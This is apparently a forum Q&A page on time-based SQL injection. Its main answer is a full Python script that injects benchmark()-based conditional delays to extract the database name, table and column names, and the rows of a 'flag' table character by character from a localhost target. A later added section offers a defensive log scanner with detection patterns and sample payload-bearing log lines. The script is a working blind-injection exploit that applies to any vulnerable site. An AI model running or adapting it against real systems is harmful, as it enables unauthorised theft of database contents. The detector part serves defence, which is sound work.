
Vulnerability type: SQL injection / Timing

Posted by a site user, posted at 2022-04-10 15:01


2 answers

懂视网, time: 2022-04-10 19:23

import requests

# Every request wraps one guess in if(<condition>, benchmark(1000000, md5('test')), NULL):
# when the condition is true the server burns CPU and the response arrives late, so the
# elapsed time of each request is the only information the script reads back.
urlx = "http://127.0.0.1/?id= 1 and if((substr((select database()),"
payloads = "qwertyuiopasdfghjklzxcvbnm{}_0123456789"
# Shared tail of every probe; %23 is the URL-encoded '#' that comments out the rest of the query.
DELAY = "),benchmark(1000000,md5('test')),NULL); %23"


def guess_column(table):
    columns = []      # column names recovered for `table`
    num = []          # cell values, appended column by column
    extend = 0        # number of columns
    length2 = 0
    url1 = "http://127.0.0.1/?id= 1 and if(((select count(column_name) from information_schema.columns where table_name='" + table + "')="
    url2 = "http://127.0.0.1/?id= 1 and if((substr((select column_name from information_schema.columns where table_name='" + table + "' limit "
    url3 = "http://127.0.0.1/?id= 1 and if(((select length(column_name) from information_schema.columns where table_name='" + table + "' limit "
    url4 = "http://127.0.0.1/?id= 1 and if(((substr((select "
    url5 = "http://127.0.0.1/?id= 1 and if(((select count("
    url7 = "http://127.0.0.1/?id= 1 and if(((select length("
    for i in range(50):  # number of columns
        url = url1 + str(i) + DELAY
        r = requests.get(url)
        print(url)
        time = r.elapsed.total_seconds()
        print(time)
        if time > 1.5:
            extend = i
            length2 = i
            break
    for k in range(extend):
        st = ""
        extend1 = 0
        for m in range(100):  # length of column name k
            url = url3 + str(k) + ",1)=" + str(m) + DELAY
            r = requests.get(url)
            time = r.elapsed.total_seconds()  # the posted code skipped this line and tested a stale value
            if time > 1.5:
                extend1 = m
                break
        for i in range(1, extend1 + 1):  # column name, one character at a time
            for payload in payloads:
                url = url2 + str(k) + ",1)," + str(i) + ",1)='" + payload + "'" + DELAY
                r = requests.get(url)
                time = r.elapsed.total_seconds()
                if time > 1.5:
                    print(url)
                    st += payload
                    break
        columns.append(st)
    length = 0
    for i in range(1, 10000):  # number of rows
        url = url5 + str(columns[0]) + ") from " + table + ")=" + str(i) + DELAY
        print(url)
        r = requests.get(url)
        time = r.elapsed.total_seconds()
        if time > 1.5:
            length = i
            break
    for column in columns:
        str1 = ""
        for i in range(length):
            length1 = 0
            url6 = url4 + str(column) + " from " + table + " limit " + str(i)
            for k in range(100):  # length of the cell in row i
                url = url7 + str(column) + ") from " + table + " limit " + str(i) + ",1)=" + str(k) + DELAY
                r = requests.get(url)
                time = r.elapsed.total_seconds()
                if time > 1.5:
                    print(url)
                    length1 = k
                    break
            for n in range(1, length1 + 1):  # cell value, one character at a time
                for payload in payloads:
                    url = url6 + ",1)," + str(n) + ",1))='" + str(payload) + "'" + DELAY
                    r = requests.get(url)
                    time = r.elapsed.total_seconds()
                    if time > 1.5:
                        print(url)
                        str1 += payload
                        break
            num.append(str1)
            str1 = ""
    # Print the header row, then one line per row; num holds column-major data,
    # so cell (row i, column k) lives at index i + length * k.
    for column in columns:
        print(column + " ", end="")
    print()
    for i in range(length):
        for k in range(length2):
            x = i + length * k
            print(num[x] + " ", end="")
        print()


def guess_table():
    tables = []
    extend = 0  # number of tables in the current database
    url1 = "http://127.0.0.1/?id= 1 and if(((select count(table_name) from information_schema.tables where table_schema=database())="
    url2 = "http://127.0.0.1/?id= 1 and if((substr((select table_name from information_schema.tables where table_schema=database() limit "
    url3 = "http://127.0.0.1/?id= 1 and if(((select length(table_name) from information_schema.tables where table_schema=database() limit "
    for i in range(50):
        url = url1 + str(i) + DELAY
        r = requests.get(url)
        time = r.elapsed.total_seconds()
        if time > 1.5:
            extend = i
            break
    for k in range(extend):
        st = ""
        extend1 = 0
        for m in range(100):  # length of table name k
            url = url3 + str(k) + ",1)=" + str(m) + DELAY
            r = requests.get(url)
            time = r.elapsed.total_seconds()
            if time > 1.5:
                extend1 = m
                break
        for i in range(1, extend1 + 1):  # table name, one character at a time
            for payload in payloads:
                url = url2 + str(k) + ",1)," + str(i) + ",1)='" + payload + "'" + DELAY
                r = requests.get(url)
                time = r.elapsed.total_seconds()
                if time > 1.5:
                    st += payload
                    break
        tables.append(st)
    print("------------")
    for i in tables:
        print(f"[*]{i}")
    print("------------")
    guess_column("flag")


def main():
    string = ""
    url1 = "http://127.0.0.1/?id= 1 and if((length(database())="
    extend = 0  # length of the database name
    for k in range(20):
        url = url1 + str(k) + DELAY
        r = requests.get(url)
        time = r.elapsed.total_seconds()
        if time > 1.5:
            extend = k
            break
    for i in range(1, extend + 1):  # database name, one character at a time
        for payload in payloads:
            url = urlx + str(i) + ",1)='"
            url = url + payload + "'" + DELAY
            r = requests.get(url)
            time = r.elapsed.total_seconds()
            if time > 1.5:
                string += payload
                break
    print(f"available database [*] {string}")
    guess_table()


main()

 

SQL injection: a time-delay injection script based on the benchmark function

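The script above leaves a very recognisable trail: hundreds of near-identical requests whose query string carries benchmark() inside an if(), with information_schema lookups and one-character substr() guesses, and whose response time flips between fast and slow depending on the guess. The following is an added detection example, not code from the original post; it assumes an Apache/Nginx-style access log with the response time appended in microseconds (the %D field), and the log lines it scans are constructed for the example.

```python
# Added example (not from the original post): flag time-based blind SQL injection
# probes in web-server access logs. Assumes combined-log lines with the response
# time in microseconds as the final field; the sample lines below are constructed.
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) (?P<usec>\d+)$'
)

# Indicators mirrored from what a benchmark()/sleep() probing script emits.
# Matched against the percent-decoded, lower-cased query string.
TIME_SQLI_PATTERNS = [
    (r"\bbenchmark\s*\(", "benchmark() CPU delay"),
    (r"\bsleep\s*\(", "sleep() delay"),
    (r"\bif\s*\(", "conditional if()"),
    (r"\bsubstr(?:ing)?\s*\(", "substr() character extraction"),
    (r"\binformation_schema\b", "schema enumeration"),
    (r"\bdatabase\s*\(\s*\)", "database() call"),
]
DELAY_FUNCS = re.compile(r"\b(benchmark|sleep)\s*\(")

# Constructed sample log: a normal request, two probes from the same client
# (one true guess that stalled the server, one false guess that returned fast),
# and a benign search that happens to contain the word "sleep".
SAMPLE_LOG = [
    '10.0.0.9 - - [10/Apr/2022:19:22:58 +0800] "GET /?id=1 HTTP/1.1" 200 512 12000',
    '10.0.0.5 - - [10/Apr/2022:19:23:01 +0800] "GET /?id=%201%20and%20if((substr((select%20database()),1,1)=%27s%27),benchmark(1000000,md5(%27test%27)),NULL);%20%23 HTTP/1.1" 200 512 1860423',
    '10.0.0.5 - - [10/Apr/2022:19:23:03 +0800] "GET /?id=%201%20and%20if(((select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema=database())=3),benchmark(1000000,md5(%27test%27)),NULL);%20%23 HTTP/1.1" 200 512 15000',
    '10.0.0.9 - - [10/Apr/2022:19:23:05 +0800] "GET /search?q=sleep+schedule+tips HTTP/1.1" 200 2048 9800',
]


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["seconds"] = int(rec["usec"]) / 1_000_000
    return rec


def decoded_query(path):
    """Probes arrive percent-encoded (%28, %27, %23 ...); decode before matching."""
    return unquote_plus(urlsplit(path).query)


def classify(query):
    """Return (verdict, hits). 'delay' when a timing primitive is present,
    'enumeration' when two or more other indicators co-occur, else None."""
    q = query.lower()
    hits = [name for pat, name in TIME_SQLI_PATTERNS if re.search(pat, q)]
    if DELAY_FUNCS.search(q):
        return "delay", hits
    if len(hits) >= 2:
        return "enumeration", hits
    return None, hits


def scan_log(lines, slow_threshold=1.0):
    """Return (flagged, per_client): flagged requests with their indicators and
    whether the response exceeded slow_threshold seconds, plus a per-IP count.
    The slow/fast alternation is the oracle the attacker reads, so it is recorded."""
    flagged, per_client = [], Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        verdict, hits = classify(decoded_query(rec["path"]))
        if verdict is None:
            continue
        flagged.append({
            "ip": rec["ip"], "ts": rec["ts"], "verdict": verdict, "hits": hits,
            "seconds": rec["seconds"], "slow": rec["seconds"] >= slow_threshold,
        })
        per_client[rec["ip"]] += 1
    return flagged, per_client


def noisy_clients(per_client, min_requests=2):
    """Blind extraction needs many requests per character, so request volume
    from one client is itself a signal; return IPs at or above the threshold."""
    return [ip for ip, n in per_client.items() if n >= min_requests]


if __name__ == "__main__":
    flagged, per_client = scan_log(SAMPLE_LOG)
    for f in flagged:
        print(f"{f['ts']} {f['ip']} {f['verdict']} slow={f['slow']} ({f['seconds']:.3f}s): {', '.join(f['hits'])}")
    print("clients to investigate:", noisy_clients(per_client))
```

The slow threshold defaults to 1.0 s here rather than the 1.5 s the script waits for, since the defender wants to see both the true guesses (delayed) and the false ones (fast) from the same client; in production the threshold should be set from the application's normal latency distribution, and the per-client count is the more robust signal because each extracted character costs the attacker dozens of requests.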

Helpful netizen, time: 2022-04-10 16:31

Try testing it with the 亿思 platform!